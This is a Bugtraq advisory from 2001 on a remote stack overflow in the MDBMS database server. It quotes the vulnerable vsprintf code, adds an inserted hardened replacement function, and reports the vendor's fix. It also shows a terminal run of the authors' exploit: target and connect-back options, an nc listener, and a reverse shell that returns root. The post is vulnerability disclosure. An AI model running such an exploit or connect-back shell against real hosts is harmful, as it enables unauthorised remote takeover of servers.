Bugtraq mailing list archives

Remote buffer overflow in MDBMS.


From: teleh0r - <teleh0r () digit-labs org>
Date: Tue, 12 Jun 2001 21:47:37 +0200


Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and earlier contain an exploitable
buffer overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
 
Below is the faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[10000];                 /* fixed-size stack buffer */
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); /* <---- no length limit: formatted text longer than b[] overruns the stack */
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000); /* realloc result never checked */
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);
}
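As an added example (not MDBMS code and not the fix Marty shipped), here is how a hardened counterpart of uprintf() can avoid the fixed 10000-byte stack buffer entirely; it assumes a hypothetical outq struct standing in for the outbuf/outsize pair and a hypothetical demo_oversized() driver:

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for MDBMS's per-connection outbuf/outsize pair. */
struct outq { char *buf; size_t len; size_t cap; }; /* buf NUL-terminated, NULL when empty */

/* Hardened counterpart of uprintf(): vsnprintf() first measures the
 * formatted length, the queue is grown to fit, and the text is formatted
 * straight into it. No fixed-size intermediate buffer exists, so oversized
 * client input cannot overrun the stack. Returns 0 on success, -1 on a
 * formatting or allocation failure (the caller should drop the client). */
int safe_uprintf(struct outq *q, const char *fmt, ...)
{
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);
    int need = vsnprintf(NULL, 0, fmt, ap); /* size only, writes nothing */
    va_end(ap);
    if (need < 0) { va_end(ap2); return -1; }
    size_t want = q->len + (size_t)need + 1;
    if (want > q->cap) {
        size_t ncap = q->cap ? q->cap : 1024;
        while (ncap < want) ncap *= 2;
        char *nb = realloc(q->buf, ncap);
        if (!nb) { va_end(ap2); return -1; } /* the original never checked realloc */
        q->buf = nb;
        q->cap = ncap;
    }
    vsnprintf(q->buf + q->len, q->cap - q->len, fmt, ap2);
    va_end(ap2);
    q->len += (size_t)need;
    return 0;
}

/* Demonstration: a constructed client line of n bytes, far beyond the
 * 10000-byte b[] of the original, is queued through "%s" (client data is
 * never used as the format string). Returns the resulting queue length. */
size_t demo_oversized(size_t n)
{
    struct outq q = {0};
    char *input = malloc(n + 1);
    if (!input) return 0;
    memset(input, 'A', n); input[n] = '\0';
    size_t len = safe_uprintf(&q, "%s\n", input) == 0 ? q.len : 0;
    free(input);
    free(q.buf);
    return len;
}
```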
 
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to marty () hinttech com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for his kind response and quick update.
 
Exploit example:
----------------
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r () digit-labs org> - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
 
     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r () digit-labs org> - Copyright (c) 2001
 
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...
 
-> * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
                 -- Elbert Hubbard

Attachment: mdbms.tar.gz